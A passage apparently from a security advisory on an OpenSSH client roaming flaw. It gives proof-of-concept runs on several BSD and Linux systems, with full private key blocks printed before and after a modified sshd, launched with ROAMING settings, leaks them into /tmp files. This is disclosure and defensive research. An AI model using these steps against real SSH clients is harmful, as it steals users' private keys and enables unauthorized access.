/usr/bin/ssh -o ProxyCommand=\"/bin/nc %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n This behavior is intriguing, because (at least on Linux and BSD) the\n signal() call that installed the main_sigchld_handler() is supposed to\n be equivalent to a sigaction() call with SA_RESTART. However, portable\n versions of OpenSSH override signal() with mysignal(), a function that\n calls sigaction() without SA_RESTART. \n\n This last mitigating factor is actually a race-condition bug that\n depends on the ProxyCommand itself: for example, the client never\n fails to reconnect to the server when using Socat as a ProxyCommand,\n but fails occasionally when using Netcat. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\nvOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi\n/rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE\nK+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr\n+7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n\nUxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7\nqsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11\n1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV\npmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:1280\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-97ed9f59/infoleak\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:768\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-9448bb7f/infoleak\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\n... \n\n# env ROAMING=\"client_out_buf_size:1024\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-279f5e2b/infoleak\n... \niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n... \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:2048\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-35ee7ab0/infoleak\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-6cb31d82/infoleak\n... \nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n$ /usr/bin/ssh -V\nOpenSSH_7.0, LibreSSL 2.2.2\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL\nruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s\n17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8\nL/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh\nxSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP\nvavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl\nJka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP\nKyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19\nqJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY\ngQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK\nQolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt\ngKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL\ncQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB\n+s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl\nhcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri\nhBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh\nvhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O\nnFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG\n8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n-----END RSA PRIVATE KEY-----\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 1 %h %p\" -p 222 127.0.0.1\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n(this example requires a ProxyCommand because of the NULL-aitop bug\ndescribed in the Mitigating Factors of the Information Leak section, and\ncrashes because of the NULL-pointer dereference discussed in the\nMitigating Factors of the Buffer Overflow section)\n\n# cat /tmp/roaming-a5eca355/infoleak\nry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: CentOS 7, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"CentOS Linux 7 (Core)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n\nGLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2\nhUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-b7b16dfc/infoleak\njJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5\n\n# strings /tmp/roaming-b324ce87/infoleak\nIuQL\nR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9v\n\n# strings /tmp/roaming-24011739/infoleak\nKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC\n\n# strings /tmp/roaming-37456846/infoleak\nLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA\nyq4Kwj/\n\n# strings /tmp/roaming-988ff54c/infoleak\nGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\n\n# strings /tmp/roaming-53887fa5/infoleak\n/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: Fedora 20, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"Fedora 20 (Heisenbug)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz\nHLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp\no9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ\n/B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy\n2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr\nHiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\njwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm\nqK+cwb7uC